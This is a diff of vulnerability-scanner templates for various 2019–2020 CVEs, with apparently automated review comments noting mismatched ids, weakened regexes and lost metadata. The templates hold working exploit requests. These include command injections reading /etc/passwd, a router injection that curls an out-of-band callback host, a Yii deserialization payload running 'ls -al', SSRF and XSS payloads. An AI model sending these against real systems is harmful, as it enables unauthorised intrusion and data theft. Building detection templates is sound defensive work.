@@ -1,15 +1,13 @@ -id: CVE-2019-7256 +id: cve-2019-7256 info: name: eMerge E3 1.00-06 - Remote Code Execution author: pikpikcu severity: critical - description: Linear eMerge E3-Series devices allow Command Injections. - reference: https://www.exploit-db.com/exploits/47619 - tags: cve,cve2019,emerge,rce # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ +# Refrence: https://www.exploit-db.com/exploits/47619 requests: - raw: # Default Port @@ -19,6 +17,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 @@ -28,6 +27,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 @@ -39,4 +39,4 @@ requests: - 200 - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" diff --git a/poc/cve/CVE-2019-8451.yaml b/poc/cve/CVE-2019-8451.yaml index 4f4aca0d1f..633704f7ad 100644 --- a/poc/cve/CVE-2019-8451.yaml +++ b/poc/cve/CVE-2019-8451.yaml 
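Review bot: The last hunk for this template narrows the passwd regex from `root:.*:0:0:` to `root:[x*]:0:0:`, which only matches when the password field is `x` or `*`; a device that keeps a hash or an empty field in /etc/passwd would no longer be detected. I would keep `- "root:.*:0:0:"`. The same narrowing appears in the CVE-2020-11738 and CVE-2020-35736 hunks further down. The first hunk also removes `description`, `reference` and `tags`, so the template can no longer be selected or excluded by tag; if the reference stays a comment, fix the spelling to `# Reference: https://www.exploit-db.com/exploits/47619`.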
@@ -2,34 +2,30 @@ id: CVE-2019-8451 info: name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource - author: TechbrunchFR + author: "TechbrunchFR" severity: medium - description: The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class. - reference: - - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in - - https://jira.atlassian.com/browse/JRASERVER-69793 - - https://hackerone.com/reports/713900 - tags: cve,cve2019,atlassian,jira,ssrf,oast - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N - cvss-score: 6.50 - cve-id: CVE-2019-8451 - cwe-id: CWE-918 -requests: - - method: POST - path: - - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest' +# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important +# security issue reported in August 2019. - body: | - url=https://{{Host}}:443@{{interactsh-url}} +# CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in +# the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class. +# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable +# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal +# network resources. 
+# https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in +# https://twitter.com/benmontour/status/1177250393220239360 +# https://twitter.com/ojensen5115/status/1176569607357730817 +requests: + - method: GET + path: + - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com' headers: - X-Atlassian-Token: no-check - Content-Type: application/x-www-form-urlencoded - + X-Atlassian-token: no-check matchers: - type: word - part: interactsh_protocol + name: ssrf-response-body words: - - "http" # Confirms the HTTP Interaction + - '

This domain is for use in illustrative examples in documents.' + part: body diff --git a/poc/cve/CVE-2020-10199.yaml b/poc/cve/CVE-2020-10199.yaml index 21a289174a..94ec25d713 100644 --- a/poc/cve/CVE-2020-10199.yaml +++ b/poc/cve/CVE-2020-10199.yaml @@ -1,24 +1,24 @@ id: CVE-2020-2199 info: - name: Nexus Repository Manager RCE + name: Jenkins Subversion Partial Release Manager XSS author: medbsq - severity: high -#https://www.cvebase.com/cve/2020/10199 + severity: medium + requests: - method: POST path: - - "{{BaseURL}}/rest/beta/repositories/go/group" + - "{{BaseURL}}/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:zie" headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - Content-Type: application/json - body: "{\"name\": \"internal\",\"online\": true,\"storage\": {\"blobStoreName\": \"default\",\"strictContentTypeValidation\": true},\"group\": {\"memberNames\": [\"$\\c{ 1337 * 1337 }\"]}}" + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: - type: word words: - - "1787569" - part: body + - "pwn.seam" + - "?pwned=" + condition: and + part: header - type: status status: - - 400 + - 200 diff --git a/poc/cve/CVE-2020-11738.yaml b/poc/cve/CVE-2020-11738.yaml index 280607b065..6b169370b6 100644 --- a/poc/cve/CVE-2020-11738.yaml +++ b/poc/cve/CVE-2020-11738.yaml @@ -1,4 +1,5 @@ id: CVE-2020-11738 + info: name: WordPress Duplicator plugin Directory Traversal author: dwisiswant0 
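Review bot: The new matcher depends on the target being able to fetch example.com and on the exact wording of that page (`part: body` with the `This domain is for use in illustrative examples` string), so a host without outbound internet access, or any change to that page, produces a false negative. The removed out-of-band check (`part: interactsh_protocol` with the word `http`) did not depend on third-party page content and is the more reliable signal. The vulnerability description now sits in YAML comments between `severity` and `requests`, where it is not available as template metadata; keeping it under `description:` and restoring `classification` and `tags` would preserve it for triage.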
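Review bot: After this hunk the file named CVE-2020-10199.yaml carries `id: CVE-2020-2199` and a Jenkins Subversion check, and the Nexus Repository Manager request and matchers are gone, so nothing under this file name tests for CVE-2020-10199 any more. I would leave the Nexus template here and put the Jenkins one in a file named after its own id. The new header matcher words `pwn.seam` and `?pwned=` do not obviously relate to the `svnRemoteLocationCheck` request and look carried over from another template; please confirm them against a known-vulnerable response. The new `info` block also has no `description`, `reference` or `tags`.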
@@ -9,17 +10,11 @@ info: According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before. - reference: + + References: - https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild - - https://snapcreek.com/duplicator/docs/changelog/?lite - - https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/ - - http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-11738 - cwe-id: CWE-22 - tags: cve,cve2020,wordpress,wp-plugin,lfi,kev + tags: cve,cve2020,wordpress,wp-plugin,lfi + requests: - method: GET path: @@ -39,7 +34,7 @@ requests: part: header - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" - "define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'" condition: or - part: body + part: body \ No newline at end of file diff --git a/poc/cve/CVE-2020-13483.yaml b/poc/cve/CVE-2020-13483.yaml index 93175bfeeb..7f6b791d4b 100644 --- a/poc/cve/CVE-2020-13483.yaml +++ b/poc/cve/CVE-2020-13483.yaml 
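Review bot: The first hunk here replaces the `reference:` key with a `References:` line that appears to sit inside the multi-line `description` (the block starts above the hunk), so the links become free text instead of structured metadata. It also drops `classification` and removes `kev` from `tags`, so the template is no longer picked up when scans are filtered for known-exploited vulnerabilities. I would keep `reference:` as a key and `tags: cve,cve2020,wordpress,wp-plugin,lfi,kev`. The final `part: body` line also loses its trailing newline.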
@@ -2,29 +2,40 @@ id: CVE-2020-13483 info: name: Bitrix24 through 20.0.0 allows XSS - author: pikpikcu - severity: high - reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 + author: pikpikcu,3th1c_yuk1 + severity: medium description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. + reference: + - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 + - https://twitter.com/brutelogic/status/1483073170827628547 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-13483 + cwe-id: CWE-79 tags: cve,cve2020,xss,bitrix requests: - method: GET path: + - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>' - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E' + stop-at-first-match: true matchers-condition: and matchers: - type: word + part: body words: + - '*/)});function __MobileAppList(){alert(1)}//' - "function(handler){};function __MobileAppList(test){alert(document.domain);};//" - part: body + condition: or - type: word + part: header words: - text/html - part: header - type: status status: diff --git a/poc/cve/CVE-2020-13700.yaml b/poc/cve/CVE-2020-13700.yaml index 645363a779..42d1d0f6e1 100644 --- a/poc/cve/CVE-2020-13700.yaml +++ b/poc/cve/CVE-2020-13700.yaml 
@@ -6,10 +6,15 @@ info: severity: high reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5 description: | - An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress. - It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a - wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. - tags: cve,cve2020,wordpress + An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress. + It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a + wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. + tags: cve,cve2020,wordpress,plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-13700 + cwe-id: CWE-639 requests: - method: GET diff --git a/poc/cve/CVE-2020-14413.yaml b/poc/cve/CVE-2020-14413.yaml index e260ce4ca9..5cbe2e48a3 100644 --- a/poc/cve/CVE-2020-14413.yaml +++ b/poc/cve/CVE-2020-14413.yaml @@ -7,11 +7,6 @@ info: reference: https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8 description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value. tags: cve,cve2020,nedi,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-14413 - cwe-id: CWE-79 requests: - method: GET diff --git a/poc/cve/CVE-2020-15148.yaml b/poc/cve/CVE-2020-15148.yaml index a9e3680ead..34b71f6245 100644 --- a/poc/cve/CVE-2020-15148.yaml +++ b/poc/cve/CVE-2020-15148.yaml 
@@ -1,15 +1,28 @@ id: CVE-2020-15148 info: - name: Yii 2 (yiisoft/yii2) RCE + name: Yii 2 < 2.0.38 - Remote Code Execution author: pikpikcu - severity: high - reference: | - - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 - - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md + severity: critical + description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. + reference: + - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 + - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md + - https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99 + - https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mj + remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2020-15148 + cwe-id: CWE-502 + cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* + epss-score: 0.01843 tags: cve,cve2020,rce,yii + metadata: + max-request: 1 -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==" 
@@ -19,9 +32,11 @@ requests: - type: word words: - "total" - - "internal server error" + - "An internal server error occurred." condition: and - type: status status: - 500 + +# Enhanced by mp on 2022/04/27 diff --git a/poc/cve/CVE-2020-17456.yaml b/poc/cve/CVE-2020-17456.yaml index fba91c11a2..8d4fa7417d 100644 --- a/poc/cve/CVE-2020-17456.yaml +++ b/poc/cve/CVE-2020-17456.yaml @@ -5,18 +5,31 @@ info: author: gy741,edoardottt severity: critical description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/ - https://nvd.nist.gov/vuln/detail/CVE-2020-17456 - http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/166273/Seowon-SLR-120-Router-Remote-Code-Execution.html + - https://www.exploit-db.com/exploits/50821 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-17456 cwe-id: CWE-78 + epss-score: 0.97074 + epss-percentile: 0.99709 + cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: seowonintech + product: slc-130_firmware tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve +variables: + useragent: '{{rand_base(6)}}' -requests: +http: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 
@@ -31,9 +44,10 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://{{interactsh-url}}&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 + Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -41,6 +55,11 @@ requests: words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{useragent}}" + - type: word part: header words: @@ -50,4 +69,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/04/27 +# digest: 4a0a0047304502207efe0e5176d8b7d54f1dda7435cf09de296c0603142b0b3cafc19e0ac334d3e2022100e45da5c829c62d576a067a9de1f1d6f5e1eb96aaeb6f56b8604bd7df5765d874:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2020-21224.yaml b/poc/cve/CVE-2020-21224.yaml index 4b25b87e1f..1e84564e2d 100644 --- a/poc/cve/CVE-2020-21224.yaml +++ b/poc/cve/CVE-2020-21224.yaml @@ -7,11 +7,6 @@ info: description: A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul tags: cve,cve2020,clusterengine,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-21224 - cwe-id: CWE-88 requests: - method: POST @@ -22,7 +17,7 @@ requests: Referer: "{{Hostname}}/module/login/login.html" body: | - op=login&username=;`cat /etc/passwd`&password= + op=login&username=;`cat /etc/passwd`&password= matchers-condition: and matchers: 
diff --git a/poc/cve/CVE-2020-24186.yaml b/poc/cve/CVE-2020-24186.yaml index db823bc245..3889ec4b1a 100644 --- a/poc/cve/CVE-2020-24186.yaml +++ b/poc/cve/CVE-2020-24186.yaml @@ -6,7 +6,12 @@ info: severity: critical description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md - tags: cve,cve2020,wordpress,wp-plugin,rce + tags: cve,cve2020,wordpress,wp-plugin,rce,upload + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-24186 + cwe-id: CWE-434 requests: - raw: @@ -14,25 +19,14 @@ requests: GET /?p=1 HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 745 - Accept: */* X-Requested-With: XMLHttpRequest - sec-ch-ua-mobile: ?0 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak Origin: {{BaseURL}} - Sec-Fetch-Site: same-origin - Sec-Fetch-Mode: cors - Sec-Fetch-Dest: empty Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: close ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="action" diff --git a/poc/cve/CVE-2020-24571.yaml b/poc/cve/CVE-2020-24571.yaml index 3e8f391472..7ac3c519d7 100644 --- a/poc/cve/CVE-2020-24571.yaml +++ b/poc/cve/CVE-2020-24571.yaml 
@@ -6,6 +6,11 @@ info: description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal. reference: https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 tags: cve,cve2020,nexusdb,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-24571 + cwe-id: CWE-22 requests: - method: GET diff --git a/poc/cve/CVE-2020-24579.yaml b/poc/cve/CVE-2020-24579.yaml index 59e567cfe4..5f354d7712 100644 --- a/poc/cve/CVE-2020-24579.yaml +++ b/poc/cve/CVE-2020-24579.yaml 
@@ -1,48 +1,48 @@ id: CVE-2020-24579 info: - name: D-Link DSL 2888a - Authentication Bypass/Remote Command Execution + name: DLINK DSL 2888a RCE author: pikpikcu - severity: high - description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. - reference: - - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ - - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-24579 - classification: - cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-24579 - cwe-id: CWE-287 - epss-score: 0.00215 + severity: medium + description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. 
+ reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ tags: cve,cve2020,dlink,rce - metadata: - max-request: 2 -http: +requests: - raw: - | # Response:Location: /page/login/login_fail.html POST / HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: id,en-US;q=0.7,en;q=0.3 + DNT: 1 + Connection: close Cookie: uid=6gPjT2ipmNz + Upgrade-Insecure-Requests: 1 + Content-Length: 0 username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b - | # Get /etc/passwd GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: id,en-US;q=0.7,en;q=0.3 + DNT: 1 + Connection: close Cookie: uid=6gPjT2ipmNz + Upgrade-Insecure-Requests: 1 + Content-Length: 0 matchers-condition: and matchers: - type: status status: - 200 - - type: regex regex: - "nobody:[x*]:65534:65534" - - "root:.*:0:0:" + - "root:.*:0:0" condition: or - -# Enhanced by mp on 2022/07/13 diff --git a/poc/cve/CVE-2020-25078.yaml b/poc/cve/CVE-2020-25078.yaml index 16195b1423..1789b5371c 100644 --- a/poc/cve/CVE-2020-25078.yaml +++ b/poc/cve/CVE-2020-25078.yaml 
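Review bot: The added `Content-Length: 0` header on the `POST /` request contradicts the `username=admin&password=…` body that follows, so a server or proxy that honours the header may ignore the body and the login step may fail silently, giving a false negative; I would drop both `Content-Length: 0` lines and let the engine compute the length. `severity` goes from `high` to `medium` although the template still checks command execution through `execute_cmd.cgi`, which understates the finding. The regex also loses its trailing colon (`root:.*:0:0`), which makes it looser than the same pattern in the other templates of this commit.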
@@ -1,24 +1,15 @@ id: CVE-2020-25078 info: - name: D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure + name: D-Link DCS-2530L Administrator password disclosure author: pikpikcu severity: high - description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure. - reference: - - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180 - - https://twitter.com/Dogonsecurity/status/1273251236167516161 - - https://nvd.nist.gov/vuln/detail/CVE-2020-25078 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-25078 - epss-score: 0.96698 + description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure. + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078 tags: cve,cve2020,dlink - metadata: - max-request: 1 -http: + +requests: - method: GET path: - "{{BaseURL}}/config/getuser?index=0" @@ -39,5 +30,3 @@ http: - type: status status: - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/poc/cve/CVE-2020-27735.yaml b/poc/cve/CVE-2020-27735.yaml index 31b0f18651..dc84ec8031 100644 --- a/poc/cve/CVE-2020-27735.yaml +++ b/poc/cve/CVE-2020-27735.yaml @@ -8,6 +8,11 @@ info: An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735 tags: cve,cve2020,xss,wing-ftp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-27735 + cwe-id: CWE-79 requests: - method: GET 
diff --git a/poc/cve/CVE-2020-35489.yaml b/poc/cve/CVE-2020-35489.yaml index 57f9fd7798..38c6fb3ae6 100644 --- a/poc/cve/CVE-2020-35489.yaml +++ b/poc/cve/CVE-2020-35489.yaml @@ -1,22 +1,30 @@ id: CVE-2020-35489 info: - name: contacts form - author: medbsq + name: WordPress Contact Form 7 Plugin - Unrestricted File Upload + author: soyelmago severity: critical + description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters. + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35489 + tags: cve,cve2020,wordpress,wp-plugin requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - - type: word - words: - - "Stable tag:" - part: body - type: status status: - 200 + + - type: word + words: + - "Contact Form 7" + part: body + + - type: regex + regex: + - '^([0-4]\.|5\.[0-2]\.|5\.3\.[0-1]$)' + part: body \ No newline at end of file diff --git a/poc/cve/CVE-2020-35736.yaml b/poc/cve/CVE-2020-35736.yaml index 0a2da783b9..ef1f03d2b5 100644 --- a/poc/cve/CVE-2020-35736.yaml +++ b/poc/cve/CVE-2020-35736.yaml @@ -19,7 +19,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" - type: status status: diff --git a/poc/cve/CVE-2020-35951.yaml b/poc/cve/CVE-2020-35951.yaml index dcbf8b8b71..8f6e44259c 100644 --- a/poc/cve/CVE-2020-35951.yaml +++ b/poc/cve/CVE-2020-35951.yaml @@ -68,7 +68,7 @@ requests: - "not found in ([/a-z_]+)wp" req-condition: true - matchers-condition: or + matchers-condition: and matchers: - type: word diff --git a/poc/cve/CVE-2020-36112.yaml b/poc/cve/CVE-2020-36112.yaml index 142c4a081a..2d227f4e18 100644 --- a/poc/cve/CVE-2020-36112.yaml +++ b/poc/cve/CVE-2020-36112.yaml 
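Review bot: The new version regex `'^([0-4]\.|5\.[0-2]\.|5\.3\.[0-1]$)'` is anchored with `^` and applied to `part: body`, but readme.txt does not begin with a version number, so unless the engine runs the pattern in multi-line mode this matcher can never be true and, with `matchers-condition: and`, the template never fires. Even in multi-line mode it would match any line that starts with such a number, for example a changelog entry. Tying the pattern to the tag line avoids both problems: `- '(?m)^Stable tag: ([0-4]\.|5\.[0-2]\.|5\.3\.[0-1]$)'`. The template name claims file upload while the check only reads a version, so a comment stating that this is version-based detection would help whoever triages the result.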
@@ -3,11 +3,9 @@ id: CVE-2020-36112 info: name: CSE Bookstore 1.0 SQL Injection author: geeknik - description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database. - reference: | - - https://www.exploit-db.com/exploits/49314 - - https://www.tenable.com/cve/CVE-2020-36112 - severity: critical + description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database. + reference: https://www.exploit-db.com/exploits/49314 + severity: high tags: cve,cve2020,sqli,cse requests: 
